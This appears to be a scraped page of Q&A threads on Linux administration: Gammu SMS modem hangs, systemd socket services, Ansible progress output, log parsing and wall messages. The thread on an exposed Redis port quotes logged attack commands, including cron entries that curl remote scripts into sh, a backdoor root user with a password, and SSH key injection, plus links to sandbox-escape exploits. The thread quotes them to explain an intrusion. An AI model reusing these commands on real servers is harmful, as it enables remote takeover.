Gammu stops receiving SMS after a while - gammu

I have a problem that's been bugging me for a while now. I've been searching for solutions for 2 weeks now without any result. These guys have the same problem as me but no answers there..
I'm running gammu (1.31) and gammu-smsd on a Rpi with raspbian.
Using a Huawei E367.
Don't know why I got 3 devices /dev/ttyUSB0, /dev/ttyUSB1, /dev/ttyUSB2
Since I don't know the difference between these I tried different settings and got it running with the following; gammuconf ttyUSB0 and gammu-smsdrc ttyUSB2. Both as root and normal users.
Sending SMS works great. Then comes the problem. Receiving SMS works for a while, then just stops. If I reboot the system it starts to work again. For a while, but the same thing happens after a while.
# Configuration file for Gammu SMS Daemon
# Gammu library configuration, see gammurc(5)
[gammu]
# Please configure this!
port = /dev/ttyUSB2
connection = at
# Debugging
#logformat = textall
# SMSD configuration, see gammu-smsdrc(5)
[smsd]
service = files
logfile = /home/pi/gammu/log/log_smsdrc.txt
# Increase for debugging information
debuglevel = 0
# Paths where messages are stored
inboxpath = /home/pi/gammu/inbox/
outboxpath = /home/pi/gammu/outbox/
sentsmspath = /home/pi/gammu/sent/
errorsmspath = /home/pi/gammu/error/
ReceiveFrequency = 2
LoopSleep = 1
GammuCoding = utf8
CommTimeout = 0
#RunOnReceive =
Log
Tue 2015/03/31 11:05:19 gammu-smsd[7379]: Starting phone communication...
Tue 2015/03/31 11:07:07 gammu-smsd[7379]: Terminating communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2091]: Warning: No PIN code in /etc/gammu-smsdrc file
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Created POSIX RW shared memory at 0xb6f6d000
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error
opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Going to 30 seconds sleep because of too much connection errors
Tue 2015/03/31 11:08:14 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:08:21 gammu-smsd[2116]: Soft reset return code: Function not supported by phone. (NOTSUPPORTED[21])
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Read 2 messages
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received
IN20150331_110600_00_+xxxxxx_00.txt
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received
IN20150331_110820_00_+xxxxxx_00.txt
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Received
IN20150331_110934_00_+xxxxxx_00.txt
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Received
IN20150331_111352_00_+xxxxxx_00.txt
I guess the early warnings are before my modeswitch command kicks in.
in rc.local:
sudo usb_modeswitch -v 0x12d1 -p 0x1446 -V 0x12d1 -P 0x1506 -m 0x01 -M 55534243123456780000000000000011062000000100000000000000000000 -I

I have the same Problem, so I wrote a shell script to reactivate the clean-quick /dev/ttyUSB[0-2] device, and then added it to cron job
*/5 * * * * /home/sysadmin/scripts/reanimate-usb-stick.sh >/dev/null 2>&1
reanimate-usb-stick.sh
#!/bin/bash
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
USBDEVICES=$(ls -l /dev/* | awk '/\/dev\/ttyUSB[0-7]/ {print $6}' | wc -l)
DEVICEINFO=""
DEVICEPORT=""
if [ $USBDEVICES = 0 ]
then
datas=$(lsusb | grep -i hua | awk '/Bus/ {print $6}' | tr ":" "\n")
counter=0
for line in $datas
do
counter=$((counter+1))
if [ $counter = 1 ]
then
DEVICEINFO=$(echo "$line")
fi
if [ $counter = 2 ]
then
DEVICEPORT=$(echo "$line")
fi
done
usb_modeswitch -v $DEVICEINFO -p $DEVICEPORT -J
echo "$DEVICEINFO - $DEVICEPORT"
else
echo "ALLES OK : $USBDEVICES"
exit
fi

This looks pretty much same as https://github.com/gammu/gammu/issues/4 and even though there were some attempts to fix this in Gammu, it seems that the Huawei modems firmware is simply not stable enough for this usage. Simply asking it several times for listing received messages makes it unresponsive.
Also which device you use might make slight difference, see Gammu manual and dd-wrt wiki for more information on that topic.

I had similar problem with Huawei 3g modem e1750. I added following lines to /etc/gammu-smsdrc file:
ReceiveFrequency = 60
StatusFrequency = 60
CommTimeout = 60
SendTimeout = 60
LoopSleep = 10
CheckSecurity = 0
The idea is to minimalize ammount of communication between gammu-smsd and 3g modem. Especially the default value LoopSleep=1 means that gammu sends commands to modem each second and it could be too much for modem firmware, so I used 10.
Next thing is something standard in all Raspberry/ARM embedded projects: Use powerfull power source. I'm using charger with fixed cable (I belive that some reusable cables could be inappriopriate for currents above 2A) that looks like that:
http://botland.com.pl/9240-thickbox_default/zasilacz-extreme-microusb-5v-21a-raspberry-pi.jpg
With that the modem still hangs after about 50-100 hours of operation, but it's enouth for my project.

Related

Communicating with Systemd service through socket mapped to stdin

I'm creating my first background service and I want to communicate with it through a socket.
I have the following script /tmp/myservice.sh:
#! /usr/bin/env bash
while read received_cmd
do
echo "Received command ${received_cmd}"
done
And the following socket /etc/systemd/user/myservice.socket
[Unit]
Description=Socket to communicate with myservice
[Socket]
ListenSequentialPacket=/tmp/myservice.socket
And the following service:
[Unit]
Description=A simple service example
[Service]
ExecStart=/bin/bash /tmp/myservice.sh
StandardError=journal
StandardInput=socket
StandardOutput=socket
Type=simple
The idea is to understand how to communicate with a background service, here using an unix file socket. The script works well when launched from the shell and reading stdin and I thought that by setting StandardInput = "socket" it would read from the socket the same way.
Nevertheless, when I run nc -U /tmp/myservice.socket the command returns right away and I have the following output:
$ journalctl --user -u myservice
-- Logs begin at Sat 2020-10-24 17:26:25 BST, end at Thu 2020-10-29 14:00:53 GMT. --
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21941]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21942]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21943]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21944]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21945]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Start request repeated too quickly.
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Failed with result 'start-limit-hit'.
Oct 29 08:40:16 shiny systemd[1689]: Failed to start A simple service example.
Did I misunderstand how sockets work? Why read fails to read from the socket? Should I use another mechanism to communicate with my background service (as I said, it's my first background service so I may do unconventional things here)?
The only thing I have seen working with a shell script is ListenStream= rather than ListenSequentialPacket=. (Obviously, this means you lose packet boundaries, but the shell read is usually oriented to read lines ending \n from streams, so it is not usually a problem).
But the most important thing that is missing, is the extra Accept line:
[Socket]
ListenStream=...
Accept=true
As I understand it, without this the service will be passed a socket on which it must first do a socket accept() call, to get the actual connection socket (hence the read error). The service must also then handle all further connections.
By using Accept=true, a new service will be started for each new connection, and will be passed the immediately usable socket. Note, however, that this means the service must now be templated, i.e. called myservice#.service rather than myservice.service.
(For datagram sockets, Accept must be left defaulted to false). See man systemd.socket.

attempt to hack host machine via redis open port

I have redis with open port in my development machine, these days someone try to get access to my host machine via redis, i have console with redis montiroing and these are commands thay used to get access. I provide datetime for some commands as well.
GMT: Monday, August 21, 2017 4:47:53.384 AM [0 74.82.47.3:46986] "INFO"
[0 94.74.81.202:55564] "COMMAND"
[0 94.74.81.202:55564] "flushall"
[0 94.74.81.202:55606] "COMMAND"
GMT: Monday, August 21, 2017 9:21:43.586 AM [0 94.74.81.202:55606] "set" "crackit" "\n\n\nssh-rsa .....<ssh_key>.... redis#redis.io\n\n\n\n"
[0 94.74.81.202:55646] "COMMAND"
[0 185.163.109.66:40470] "INFO"
[0 185.163.109.66:40470] "SCAN" "9000"
[0 74.82.47.5:39660] "INFO"
[0 98.142.140.13:51586] "INFO"
[0 98.142.140.13:51586] "SET" "sxyxgboqet" "\n\n*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh\n\n"
[0 52.14.111.241:58464] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\tcurl http://112.74.29.139:8898/1.sh|bash\n\n"
[0 106.2.120.103:41329] "INFO"
GMT: Tuesday, August 22, 2017 9:56:04.350 PM [0 178.62.175.211:58716] "eval" "local asnum ... see link below "
... the full lua script ...
[0 184.105.247.252:33152] "INFO"
GMT: Wednesday, August 23, 2017 7:18:35.995 AM [0 52.14.111.241:49208] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\t(useradd -G root axis2;(echo 'asdf1234' | passwd --stdin axis2) || (echo 'axis2:
asdf1234' |chpasswd));crontab -r;:>/etc/crontab;\n\n"
GMT: Wednesday, August 23, 2017 6:04:36.397 PM [0 98.142.140.13:43540] "INFO"
GMT: Thursday, August 24, 2017 5:22:26.931 AM [0 216.218.206.68:19396] "INFO"
these lines from my redis.log file
22 Aug 09:59:29.865 AM * RDB: 6 MB of memory used by copy-on-write
22 Aug 09:59:29.951 AM * Background saving terminated with success
22 Aug 09:59:30.137 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.049 AM * 1 changes in 900 seconds. Saving...
23 Aug 07:18:36.052 AM * Background saving started by pid 25388
23 Aug 07:18:36.054 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.153 AM # Background saving error
.............
repeated every 6 minutes
Can anybody explain what exaclty doing lua script? according to redis log, i guess, it tried to eval bash command which holds in "lololili" key.
thank you in advance.
Hi it's an attempt to hack your machine. You should not expose your redis on the internet without proprer firewalling.
Judging by waht I've seen I guess this one is trying to exit the lua sandobx.
There is multiplie way to hack your machine if you got an open redis server.
by exiting the lua sandbox (tried successfully on a redis 2.8.4 with the attached gist a bit modified)
by uploading bad scripts in an attempt to get them executed by you or your softwares by error. (suing the db
some references on lua sandbox exit
http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/
https://gist.github.com/firsov/4393cc162ff87e00324a6a53a353bda2
and redis file upload
https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
You should check any file belonging to redis on your host
find / -user redis
If you found nothing, good for you, but secure your server.

How can I show progress for a long-running Ansible task?

I have a some Ansible tasks that perform unfortunately long operations - things like running an synchronization operation with an S3 folder. It's not always clear if they're progressing, or just stuck (or the ssh connection has died), so it would be nice to have some sort of progress output displayed. If the command's stdout/stderr was directly displayed, I'd see that, but Ansible captures the output.
Piping output back is a difficult problem for Ansible to solve in its current form. But are there any Ansible tricks I can use to provide some sort of indication that things are still moving?
Current ticket is https://github.com/ansible/ansible/issues/4870
I came across this problem today on OSX, where I was running a docker shell command which took a long time to build and there was no output whilst it built. It was very frustrating to not understand whether the command had hung or was just progressing slowly.
I decided to pipe the output (and error) of the shell command to a port, which could then be listened to via netcat in a separate terminal.
myplaybook.yml
- name: run some long-running task and pipe to a port
shell: myLongRunningApp > /dev/tcp/localhost/4000 2>&1
And in a separate terminal window:
$ nc -lk 4000
Output from my
long
running
app will appear here
Note that I pipe the error output to the same port; I could as easily pipe to a different port.
Also, I ended up setting a variable called nc_port which will allow for changing the port in case that port is in use. The ansible task then looks like:
shell: myLongRunningApp > /dev/tcp/localhost/{{nc_port}} 2>&1
Note that the command myLongRunningApp is being executed on localhost (i.e. that's the host set in the inventory) which is why I listen to localhost with nc.
Ansible has since implemented the following:
---
# Requires ansible 1.8+
- name: 'YUM - async task'
yum:
name: docker-io
state: installed
async: 1000
poll: 0
register: yum_sleeper
- name: 'YUM - check on async task'
async_status:
jid: "{{ yum_sleeper.ansible_job_id }}"
register: job_result
until: job_result.finished
retries: 30
For further information, see the official documentation on the topic (make sure you're selecting your version of Ansible).
There's a couple of things you can do, but as you have rightly pointed out, Ansible in its current form doesn't really offer a good solution.
Official-ish solutions:
One idea is to mark the task as async and poll it. Obviously this is only suitable if it is capable of running in such a manner without causing failure elsewhere in your playbook. The async docs are here and here's an example lifted from them:
- hosts: all
remote_user: root
tasks:
- name: simulate long running op (15 sec), wait for up to 45 sec, poll every 5 sec
command: /bin/sleep 15
async: 45
poll: 5
This can at least give you a 'ping' to know that the task isn't hanging.
The only other officially endorsed method would be Ansible Tower, which has progress bars for tasks but isn't free.
Hacky-ish solutions:
Beyond the above, you're pretty much going to have to roll your own. Your specific example of synching an S3 bucket could be monitored fairly easily with a script periodically calling the AWS CLI and counting the number of items in a bucket, but that's hardly a good, generic solution.
The only thing I could imagine being somewhat effective would be watching the incoming ssh session from one of your nodes.
To do that you could configure the ansible user on that machine to connect via screen and actively watch it. Alternatively perhaps using the log_output option in the sudoers entry for that user, allowing you to tail the file. Details of log_output can be found on the sudoers man page
If you're on Linux you may use systemd-run to create a transient unit and inspect the output with journalctl, like:
sudo systemd-run --unit foo \
bash -c 'for i in {0..10}; do
echo "$((i * 10))%"; sleep 1;
done;
echo "Complete"'
And in another session
sudo journalctl -xf --unit foo
It would output something like:
Apr 07 02:10:34 localhost.localdomain systemd[1]: Started /bin/bash -c for i in {0..10}; do echo "$((i * 10))%"; sleep 1; done; echo "Complete".
-- Subject: Unit foo.service has finished start-up
-- Defined-By: systemd
-- Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- Unit foo.service has finished starting up.
--
-- The start-up result is done.
Apr 07 02:10:34 localhost.localdomain bash[10083]: 0%
Apr 07 02:10:35 localhost.localdomain bash[10083]: 10%
Apr 07 02:10:36 localhost.localdomain bash[10083]: 20%
Apr 07 02:10:37 localhost.localdomain bash[10083]: 30%
Apr 07 02:10:38 localhost.localdomain bash[10083]: 40%
Apr 07 02:10:39 localhost.localdomain bash[10083]: 50%
Apr 07 02:10:40 localhost.localdomain bash[10083]: 60%
Apr 07 02:10:41 localhost.localdomain bash[10083]: 70%
Apr 07 02:10:42 localhost.localdomain bash[10083]: 80%
Apr 07 02:10:43 localhost.localdomain bash[10083]: 90%
Apr 07 02:10:44 localhost.localdomain bash[10083]: 100%
Apr 07 02:10:45 localhost.localdomain bash[10083]: Complete

Parsing entry name from a log

Writing bash parsing scripts is my own personal nightmare, so here I am.
The server log format is below:
197 INFO Thu Mar 27 10:10:32 2014
seq_1_1..JobControl (DSWaitForJob): Waiting for job job_1_1_1 to finish
198 INFO Thu Mar 27 10:10:36 2014
seq_1_1..JobControl (DSWaitForJob): Job job_1_1_1 has finished, status = 3 (Aborted)
199 WARNING Thu Mar 27 10:10:36 2014
seq_1_1..JobControl (#job_1_1_1): Job job_1_1_1 did not finish OK, status = 'Aborted'
From here I need to parse out the string which follows the format:
Job job_name has finished, status = 3 (Aborted)
So from the output above I should get: job_1_1_1
What would the script for that look like if I get this server log as a certain command output?
Thanks xx
Using grep -P:
grep -oP '\w+(?= has finished, status = 3)' file
job_1_1_1

How to suppress EOF when echoing messages to wall from a script

In my bash script, I use many echo "......." | wall lines to broadcast event notifications as they occur.
However, the resulting output on the console gets unwieldy:
Broadcast Message from root#BIGFOOT
(somewhere) at 16:07 ...
Photo backup started on Mon Oct 7 16:07:55 PHT 2013
Broadcast Message from root#BIGFOOT
(somewhere) at 16:08 ...
Photo backup successfully finished on Mon Oct 7 16:08:05 PHT 2013
Broadcast Message from root#BIGFOOT
(somewhere) at 16:08 ...
You may now unplug the Photo Backup HDD.
Instead, we'd like it to appear more like the following,
Broadcast Message from root#BIGFOOT
(somewhere) at 16:07 ...
Photo backup started on Mon Oct 7 16:07:55 PHT 2013
Photo backup successfully finished on Mon Oct 7 16:08:05 PHT 2013
You may now unplug the Photo Backup HDD.
which is kind of like what would appear in an open write chat session.
Is this possible? If so, how should I modify my script in order to achieve the desired console output?
Each wall invocation will add the "broadcast message" and blank newline at the top of your code.
As a result, if you want to notify your users at timely intevals (e.g. actually at the start + end of the backup) then you will have to live with the banner message.
As #devnull suggested, you could batch up the messages. One approach would be to declare a script wide variable say $logmsg and then have two functions depending on whether it is something you want the user to know eventually or something they want to know now
function log_message
{
$logmsg = "$logmsg\n$1"
}
function log_message_now
{
log_message "$1"
echo "$logmsg" | wall
logmsg = ""
}
(note I've not actually tested the above, so may need a touch of debugging!)
Use a compound command:
{
echo "line1"
echo "line2"
echo "line3"
} | wall

Resources